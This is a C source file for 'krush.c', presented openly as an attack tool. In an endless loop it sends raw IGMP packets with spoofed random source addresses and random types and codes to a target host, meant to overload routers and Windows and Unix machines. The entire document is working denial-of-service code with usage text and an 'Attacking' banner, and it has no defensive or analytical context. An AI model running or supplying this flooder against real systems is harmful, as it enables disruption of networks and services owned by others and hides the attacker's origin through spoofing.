Krush.c sends spoofed igmp packets with random codes/types set. Raises the CPU average on many machines, including routers.
75c5f18c8d42e4eed047ed84d197f2998d67eaf902fde1bdd550fa0d0e96299a
/* krush.c by eTech <eTech@ziplip.com> */
/* Thanx goes to datawar for his randip function and just all around support */
/* very effective againest routers */
/* also very effective againest windows and unix machines */
/* be kareful */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <errno.h>
#include <netinet/igmp.h>
#define bail(on_what) {perror((char *)on_what);exit(1);}
#define rnd(range) (rand()%range)
void sendigmp(unsigned long int);
char *getrandip();
void sendigmp(unsigned long int dest_addr) {
struct igmp
{
struct iphdr ip;
struct igmphdr igmp;
} igmp;
int sd;
struct sockaddr_in sin;
if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
bail("Couldn't create socket");
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = igmp.ip.daddr;
igmp.ip.ihl = 5;
igmp.ip.version = 4;
igmp.ip.tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr));
igmp.ip.frag_off = 0;
igmp.ip.ttl = 255;
igmp.ip.protocol = IPPROTO_IGMP;
igmp.ip.check = 0;
igmp.ip.daddr = dest_addr;
while(1){
igmp.ip.tos = rnd(20)+1;
igmp.ip.id = rnd(65535)+1;
igmp.ip.saddr = inet_addr(getrandip());
igmp.igmp.type = rnd(8)+1;
igmp.igmp.code = rnd(100)+1;
if(sendto(sd, &igmp, ntohs(igmp.ip.tot_len), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1 ) {
bail("sendto");
}
}
close(sd);
}
/* datawar, ypout@mail.ru */
unsigned long long int rdtsc(void) {
unsigned long long int tsc;
unsigned long int tsc_l,tsc_h;
__asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
tsc=tsc_h;
tsc=(tsc<<32)|tsc_l;
return(tsc);
}
/* datawar, ypout@mail.ru */
char *
getrandip(void)
{
char *newip;
unsigned int a, b, c, d;
newip = calloc(sizeof(char), 16);
srand(rdtsc());
a:
a = rand()>>23;
if(a==0 || a==255) goto a;
b:
b = rand()>>23;
if(b==0 || b==255) goto b;
c:
c = rand()>>23;
if(c==0 || c==255) goto c;
d:
d = rand()>>23;
if(d==0 || d==255) goto d;
snprintf(newip, 16, "%u.%u.%u.%u", a, b, c, d);
return (newip);
}
int
main(int argc, char *argv[])
{
struct hostent *he;
unsigned long int dsthost;
if(argc<2) {
printf("krush.c by eTech\n");
printf("Syntax: %s <host>\n",argv[0]);
exit(1);
}
dsthost = inet_addr(argv[1]);
if (( he = gethostbyname(argv[1]) ) == NULL ){
bail("Couldn't resolve host");
}
printf("krush.c by eTech\n");
printf("\nAttacking %s with random igmp types and codes\n", argv[1]);
sendigmp(dsthost);
return(0);
}